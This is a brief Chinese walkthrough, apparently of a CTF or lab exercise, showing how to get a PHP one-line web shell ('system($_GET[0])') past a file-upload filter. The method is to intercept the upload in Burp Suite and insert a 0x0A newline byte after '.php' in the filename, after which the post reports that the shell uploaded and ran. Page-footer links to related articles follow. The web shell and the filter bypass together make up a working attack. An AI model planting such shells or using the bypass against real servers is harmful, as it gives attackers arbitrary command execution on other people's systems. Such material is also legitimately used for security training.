Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
qq_479875431 小时前
C++ 网络编程中的 Protobuf 消息分发 (Dispatcher) 设计模式Tandy12356_1 小时前
手写TCP/IP协议——IP层输出处理luoganttcc1 小时前
tcp 三次 握手土星云SaturnCloud8 小时前
不止是替代:从机械风扇的可靠性困局,看服务器散热技术新范式liulilittle8 小时前
C++ 浮点数封装。lang201509288 小时前
Sentinel核心机制:Context与EntranceNode解析chuxinweihui8 小时前
数据链路层qq_251533599 小时前
使用 Python 提取 MAC 地址aFakeProgramer10 小时前
Linux 启动流程常家壮10 小时前
Windows隐藏账号创建完全指南:技术原理与安全实践